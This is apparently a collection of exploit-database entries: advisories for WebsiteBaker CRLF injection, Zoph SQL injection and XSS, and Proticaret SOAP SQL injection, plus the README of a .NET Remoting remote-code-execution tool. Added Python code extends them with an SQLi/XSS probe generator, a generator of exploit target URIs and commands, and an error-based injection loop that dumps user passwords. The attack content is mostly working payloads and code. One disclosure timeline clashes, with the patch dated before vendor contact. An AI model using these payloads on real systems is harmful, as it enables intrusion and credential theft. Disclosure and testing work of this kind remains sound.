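def vulnerable_redirect(url_param):
    """Model of a login handler that copies the decoded `url` form field into the Location
    header unchanged (assumption about the WebsiteBaker handler, based on the advisory)."""
    return ("HTTP/1.1 302 Found\r\n"
            "Location: {}\r\n"
            "Content-Length: 0\r\n"
            "\r\n").format(url_param)


def is_safe_redirect_target(url_param):
    """Validation the handler should apply before echoing the value into a header:
    no control characters (CR, LF, NUL and friends) and only a same-site absolute path."""
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in url_param):
        return False
    return url_param.startswith("/") and not url_param.startswith("//")


def parse_response_headers(raw):
    """Minimal header parser with RFC 7230 obs-fold semantics: a line beginning with SP or HTAB
    continues the previous header instead of starting a new one."""
    head, _, _body = raw.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers = []
    for line in lines:
        if line[:1] in (" ", "\t") and headers:
            name, value = headers[-1]
            headers[-1] = (name, (value + " " + line.strip()).strip())
        else:
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
    return status, dict(headers)


# The advisory's value, and a constructed variant without the %20 after the CR LF.
ADVISORY_URL_PARAM = unquote("%0d%0a%20InjectedHeader:MaliciousCode")
NO_SPACE_URL_PARAM = unquote("/wb/%0d%0aInjectedHeader:MaliciousCode")


def splitting_outcome(url_param):
    """Where the injected text ends up once a client parses the response."""
    _status, headers = parse_response_headers(vulnerable_redirect(url_param))
    return {
        "new_header": headers.get("InjectedHeader"),
        "location": headers.get("Location"),
        "would_be_rejected": not is_safe_redirect_target(url_param),
    }


if __name__ == "__main__":
    print("advisory payload :", splitting_outcome(ADVISORY_URL_PARAM))
    print("without %20      :", splitting_outcome(NO_SPACE_URL_PARAM))
```

Both variants prove the CR LF survives into the response, which is the bug; only the second yields a header a compliant client treats as separate, which matters when the goal is to inject a Set-Cookie or a second response body rather than to demonstrate the flaw.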
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-------------------------
WebsiteBaker <= 2.8.3

VII. SOLUTION
-------------------------
No patched release is available.

VIII. REFERENCES
-------------------------
http://www.websitebaker.org

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
March 11, 2014 1: Initial release

XI. DISCLOSURE TIMELINE
-------------------------
March 11, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 11, 2014 2: Sent to vendor
June 05, 2014 3: Second mail to the vendor, without response
November 18, 2014 4: Sent to lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
platforms/php/webapps/35278.txt (84 lines, executable file)

@@ -0,0 +1,84 @@
=============================================
MGC ALERT 2014-005
- Original release date: March 5, 2014
- Last revised: November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 10/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Multiple Vulnerabilities in Zoph <= 0.9.1

II. BACKGROUND
-------------------------
Zoph (Zoph Organizes Photos) is a web based digital image presentation and management system. In other words, a photo album. It is built with PHP, MySQL and Perl.

III. DESCRIPTION
-------------------------
SQL code can be injected through the "_action" parameter of the group and user pages and the "location_id" parameter of the photos page (see the proof of concept). This bug was found as an authenticated user of the portal. To exploit it, it is only necessary to talk to the application using version 1.0 of the HTTP protocol.

A reflected XSS vulnerability has also been found in Zoph, which allows arbitrary HTML/script code to be executed in the context of the victim user's browser.
IV. PROOF OF CONCEPT
-------------------------
SQL Injection:

/zoph/php/group.php?_action=1'%22&_clear_crumbs=1
/zoph/php/photos.php?location_id=1'%22
/zoph/php/user.php?user_id=&_action=1'%22

Cross-Site Scripting GET:

/zoph/php/edit_photos.php?photographer_id=3"><script>alert(1)</script>
/zoph/php/edit_photos.php?album_id=2&_crumb=3"><script>alert(1)</script>
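The PoC URLs here and in the WebsiteBaker advisory above follow one recipe: append '" to a parameter so that a broken query surfaces a database error, or plant a "><script>alert(1)</script> marker and see whether it comes back unescaped. An added example, not Zoph, WebsiteBaker or the author's code, that generates such probe URLs for any parameterised page and classifies the response it produced; the response bodies are constructed stand-ins, not captures from real installs.

```python
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode, quote

SQLI_PROBE = "'\""                        # the  '%22  suffix the PoC URLs append
XSS_MARKER = "<script>alert(1)</script>"

DB_ERROR_SIGNATURES = [                   # error-based SQLi tells for the DBMSs involved
    re.compile(r"You have an error in your SQL syntax", re.I),                  # MySQL
    re.compile(r"Warning: mysqli?_", re.I),                                     # PHP mysql extension notices
    re.compile(r"Unclosed quotation mark after the character string", re.I),   # SQL Server
]


def sqli_probe_urls(url):
    """One probe URL per query parameter: that parameter gets the '" suffix, the others stay clean.
    This generalises the hand-made PoC URLs of both advisories to any parameterised page."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    probes = []
    for i, (name, value) in enumerate(params):
        mutated = params[:i] + [(name, value + SQLI_PROBE)] + params[i + 1:]
        probes.append(urlunsplit(parts._replace(query=urlencode(mutated, quote_via=quote))))
    return probes


def classify(url, body):
    """Decide what a PoC URL proved from the body of the response it produced.
    Returns a set of (kind, parameter) pairs; the marker may sit in a name or a value."""
    findings = set()
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        tainted = name + value
        if XSS_MARKER in tainted and XSS_MARKER in body:
            findings.add(("xss", name))
        if "'" in tainted and any(sig.search(body) for sig in DB_ERROR_SIGNATURES):
            findings.add(("sqli", name))
    return findings


# Constructed responses: what the Zoph pages would plausibly return for the PoC URLs.
ZOPH_SQLI_BODY = ("<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource. "
                  "You have an error in your SQL syntax; check the manual that corresponds to your MySQL "
                  "server version for the right syntax to use near '1'\"' at line 1")
ZOPH_XSS_BODY = '<input type="hidden" name="photographer_id" value="3"><script>alert(1)</script>">'
ZOPH_FIXED_BODY = '<input type="hidden" name="photographer_id" value="3&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;">'


if __name__ == "__main__":
    for probe in sqli_probe_urls("/zoph/php/user.php?user_id=1&_action=1"):
        print(probe)
    print(classify("/zoph/php/group.php?_action=1'%22&_clear_crumbs=1", ZOPH_SQLI_BODY))
```

The classifier deliberately demands the marker back verbatim for XSS and a DBMS error string for SQLi; a page that echoes the entity-encoded form (ZOPH_FIXED_BODY) or returns a generic error page produces no finding, which is the behaviour to look for after a fix.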
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-------------------------
Zoph <= 0.9.1

VII. SOLUTION
-------------------------
No patched release is available.

VIII. REFERENCES
-------------------------
http://www.zoph.org/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
March 11, 2014 1: Initial release

XI. DISCLOSURE TIMELINE
-------------------------
March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 5, 2014 2: Sent to vendor
June 17, 2014 3: Second mail to the vendor, without response
November 18, 2014 4: Sent to lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
platforms/windows/remote/35280.txt (78 lines, executable file)

@@ -0,0 +1,78 @@
Source: https://github.com/tyranid/ExploitRemotingService
Exploit Database Mirror: http://www.exploit-db.com/sploits/35280.zip

ExploitRemotingService (c) 2014 James Forshaw
=============================================

A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149.
It only works on Windows although some aspects _might_ work in Mono on *nix.

Usage Instructions:
===================

ExploitRemotingService [options] uri command [command args]
Copyright (c) James Forshaw 2014

Uri:
The supported URIs are as follows:
  tcp://host:port/ObjName - TCP connection on host and port
  ipc://channel/ObjName   - Named pipe channel

Options:

  -s, --secure           Enable secure mode
  -p, --port=VALUE       Specify the local TCP port to listen on
  -i, --ipc=VALUE        Specify listening pipe name for IPC channel
      --user=VALUE       Specify username for secure mode
      --pass=VALUE       Specify password for secure mode
      --ver=VALUE        Specify version number for remote, 2 or 4
      --usecom           Use DCOM backchannel instead of .NET remoting
      --remname=VALUE    Specify the remote object name to register
  -v, --verbose          Enable verbose debug output
      --useser           Uses old serialization tricks, only works on
                         full type filter services
  -h, -?, --help

Commands:
  exec [-wait] program [cmdline] : Execute a process on the hosting server
  cmd cmdline                    : Execute a command line process and display stdout
  put localfile remotefile       : Upload a file to the hosting server
  get remotefile localfile       : Download a file from the hosting server
  ls remotedir                   : List a remote directory
  run file [args]                : Upload and execute an assembly, calls entry point
  user                           : Print the current username
  ver                            : Print the OS version

This tool supports exploiting both TCP remoting services and local IPC services. To test the exploit you need to know the name of the .NET remoting service and the port it's listening on (for TCP) or the name of the Named Pipe (for IPC). You can normally find this in the server or client code. Look for things like calls to:

RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance
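Turning that code review into target URIs is mechanical, so here is an added example that is not part of ExploitRemotingService: a regex pass over server source that extracts TCP ports, IPC pipe names, well-known object URIs and the ensureSecurity flag passed to RegisterChannel, then emits every candidate URI in the tool's syntax together with the `ver` smoke-test command. The C# fragment is constructed for the example and is not from any real product.

```python
import re

# Constructed C# fragments in the style of a typical remoting host (not from the tool
# or any real product); they only show what to grep for.
SAMPLE_SOURCE = r'''
    TcpChannel tcp = new TcpChannel(8088);
    ChannelServices.RegisterChannel(tcp, false);
    RemotingConfiguration.RegisterWellKnownServiceType(
        typeof(RemoteService), "RemoteService.rem", WellKnownObjectMode.Singleton);

    IpcChannel ipc = new IpcChannel("ExampleIpcChannel");
    ChannelServices.RegisterChannel(ipc, true);
    RemotingConfiguration.RegisterWellKnownServiceType(
        typeof(AdminService), "Admin.rem", WellKnownObjectMode.SingleCall);
'''

TCP_PORT_RE = re.compile(r'new\s+TcpChannel\s*\(\s*(\d+)\s*\)')
IPC_NAME_RE = re.compile(r'new\s+IpcChannel\s*\(\s*"([^"]+)"')
OBJECT_URI_RE = re.compile(r'RegisterWellKnownServiceType\s*\(\s*typeof\s*\([^)]*\)\s*,\s*"([^"]+)"')
ENSURE_SECURITY_RE = re.compile(r'RegisterChannel\s*\(\s*\w+\s*,\s*(true|false)\s*\)')


def remoting_endpoints(source):
    """Pull out of server code the facts the tool needs: TCP ports, IPC pipe names and
    the well-known object URIs, plus each RegisterChannel's ensureSecurity flag
    (false means no channel-level authentication, the case the plain mode targets)."""
    return {
        "tcp_ports": TCP_PORT_RE.findall(source),
        "ipc_channels": IPC_NAME_RE.findall(source),
        "object_uris": OBJECT_URI_RE.findall(source),
        "ensure_security": [flag == "true" for flag in ENSURE_SECURITY_RE.findall(source)],
    }


def candidate_uris(source, host):
    """Every channel/object combination in the URI syntax the tool accepts. Code rarely says
    which object is served on which channel, so each combination is worth one 'ver' call."""
    endpoints = remoting_endpoints(source)
    uris = []
    for obj in endpoints["object_uris"]:
        uris += ["tcp://{}:{}/{}".format(host, port, obj) for port in endpoints["tcp_ports"]]
        uris += ["ipc://{}/{}".format(pipe, obj) for pipe in endpoints["ipc_channels"]]
    return uris


def smoke_test_commands(source, host):
    """The first thing to run against each candidate: the 'ver' command from the README."""
    return ["ExploitRemotingService {} ver".format(uri) for uri in candidate_uris(source, host)]


if __name__ == "__main__":
    for command in smoke_test_commands(SAMPLE_SOURCE, "TARGET"):
        print(command)
```

A channel registered with ensureSecurity set to true needs the tool's `--secure` mode and credentials; the flag is therefore worth recording alongside the URI.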
You can then try the exploit by constructing an appropriate URL. For TCP use the URL format tcp://hostname:port/ServiceName. For IPC use ipc://NamedPipeName/ServiceName.

A simple test is to do:

ExploitRemotingService SERVICEURL ver

If successful it should print the OS version of the host running the .NET remoting service. If you get an exception, the server might carry the fix for CVE-2014-1806. At this point try the COM version using:

ExploitRemotingService -usecom SERVICEURL ver

This works best locally, but it can work remotely if you modify the COM configuration and disable the firewall. If that still doesn't work, the server is probably up to date. You can also try the full serialization version using:

ExploitRemotingService -useser SERVICEURL ls c:\

For this to work the remoting service must be running with full type filter mode enabled (which some services do, IPC services in particular). It also only works with the commands ls, put and get, but that should be enough to compromise a box.

I've provided an example service to test against.
platforms/xml/webapps/35275.txt (124 lines, executable file)

@@ -0,0 +1,124 @@
Document Title:
===============
Proticaret E-Commerce Script v3.0 >= SQL Injection

Release Date:
=============
13 Nov 2014

Product & Service Introduction:
===============================
Proticaret is a free e-commerce script.

Abstract Advisory Information:
==============================
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0.

Vulnerability Disclosure Timeline:
==================================
20 Oct 2014 : Contact with Vendor
20 Nov 2014 : Vendor Response
June 26, 2014 : Patch Released
13 Nov 2014 : Public Disclosure

Discovery Status:
=================
Published

Affected Product(s):
====================
Promist Bilgi İletişim Teknolojileri A.Ş.
Product: Proticaret E-commerce Script v3.0 >=

Exploitation Technique:
=======================
Remote, Unauthenticated

Severity Level:
===============
Critical

Technical Details & Description:
================================
SQL injection in the Code parameter of the GetProductCodes operation of the ProductService SOAP web service (ASPNetPortal.ProductService.GetProductCodes in the stack trace below). The parameter is placed into a SQL Server query unescaped, and the resulting SqlException is returned to the client in the SOAP fault, so the injection is error-based: a value selected by a subquery is leaked through the server's type-conversion error message.

Proof of Concept (PoC):
=======================

Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
  <soapenv:Header/>
  <soapenv:Body>
    <tem:GetProductCodes>
      <!--Optional:-->
      <tem:Code>1' from Users where (select top 1 password from users where userId=101)>1- -</tem:Code>
      <!--Optional:-->
      <tem:StartWith>?</tem:StartWith>
    </tem:GetProductCodes>
  </soapenv:Body>
</soapenv:Envelope>

Response:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <soap:Fault>
      <faultcode>soap:Server</faultcode>
      <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'secretpassword' to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)
   at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
   at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
   at System.Data.SqlClient.SqlDataReader.Read()
   at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
   --- End of inner exception stack trace ---</faultstring>
      <detail/>
    </soap:Fault>
  </soap:Body>
</soap:Envelope>
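The fault above is an error-based oracle: SQL Server tries to compare the selected nvarchar with the integer 1 and quotes the value in the conversion error. An added example, not BGA's or the vendor's code, that builds the same GetProductCodes envelope, parses the SOAP fault for the leaked value and drives the oracle across several rows. The transport is a constructed stand-in that answers the way the advisory's server does; the table and column names, the userId range and the `--` comment terminator (the PoC shows `- -`) are assumptions.

```python
import re
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
TEM_NS = "http://tempuri.org/"
LEAK_RE = re.compile(r"Conversion failed when converting the nvarchar value '(.*?)' to data type int")


def conversion_error_payload(column, table, where):
    """T-SQL type-confusion probe: comparing the selected nvarchar with the integer 1 makes
    SQL Server put the value itself into the error text. Written with the standard '--'
    terminator; the PoC above shows '- -'."""
    return "1' from Users where (select top 1 {} from {} where {})>1--".format(column, table, where)


def build_request(code_value):
    """GetProductCodes envelope with an attacker-controlled <tem:Code>, same shape as the PoC."""
    env = ET.Element("{%s}Envelope" % SOAP_NS)
    ET.SubElement(env, "{%s}Header" % SOAP_NS)
    body = ET.SubElement(env, "{%s}Body" % SOAP_NS)
    op = ET.SubElement(body, "{%s}GetProductCodes" % TEM_NS)
    ET.SubElement(op, "{%s}Code" % TEM_NS).text = code_value
    ET.SubElement(op, "{%s}StartWith" % TEM_NS).text = "?"
    return ET.tostring(env, encoding="unicode")


def extract_leaked_value(response_xml):
    """Return the string SQL Server failed to convert, or None if the reply was not that fault."""
    fault_string = ET.fromstring(response_xml).find(".//{%s}Fault/faultstring" % SOAP_NS)
    if fault_string is None or not fault_string.text:
        return None
    match = LEAK_RE.search(" ".join(fault_string.text.split()))   # the server wraps the text
    return match.group(1) if match else None


def dump_column(send, column, table, key_column, keys):
    """Drive the oracle over several rows. `send` takes an envelope and returns the response body."""
    leaked = {}
    for key in keys:
        payload = conversion_error_payload(column, table, "{}={}".format(key_column, key))
        value = extract_leaked_value(send(build_request(payload)))
        if value is not None:
            leaked[key] = value
    return leaked


# Constructed stand-in for the vulnerable service: answers like the advisory's server for
# the rows in FAKE_DB and with an ordinary (non-fault) reply for anything else.
FAKE_DB = {101: "secretpassword", 102: "hunter2"}


def fake_send(envelope):
    code = ET.fromstring(envelope).find(".//{%s}Code" % TEM_NS).text
    match = re.search(r"userId=(\d+)", code)
    value = FAKE_DB.get(int(match.group(1))) if match else None
    if value is None:
        return ('<soap:Envelope xmlns:soap="{0}"><soap:Body>'
                '<tem:GetProductCodesResponse xmlns:tem="{1}"/></soap:Body></soap:Envelope>').format(SOAP_NS, TEM_NS)
    return ('<soap:Envelope xmlns:soap="{0}"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode>'
            '<faultstring>System.Web.Services.Protocols.SoapException: Server\n was unable to process request. ---> '
            "System.Data.SqlClient.SqlException: Conversion failed when converting\n the nvarchar value '{1}' "
            'to data type int.\n at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)'
            '</faultstring><detail/></soap:Fault></soap:Body></soap:Envelope>').format(SOAP_NS, value)


if __name__ == "__main__":
    print(dump_column(fake_send, "password", "users", "userId", range(100, 105)))
```

Against the real service `send` would be an HTTP POST of the envelope with the SOAPAction header the WSDL specifies; the rest of the loop is unchanged, which is what makes returned SqlException text a critical finding rather than an information leak.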
Solution Fix & Patch:
=====================
Apply the vendor's patch for v3.0.

Security Risk:
==============
The risk of the vulnerability above is estimated as critical.

Credits & Authors:
==================
Bilgi Güvenliği Akademisi

Disclaimer & Information:
=========================
The information provided in this advisory is provided as is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and fitness for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.

Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr

Copyright © 2014 | BGA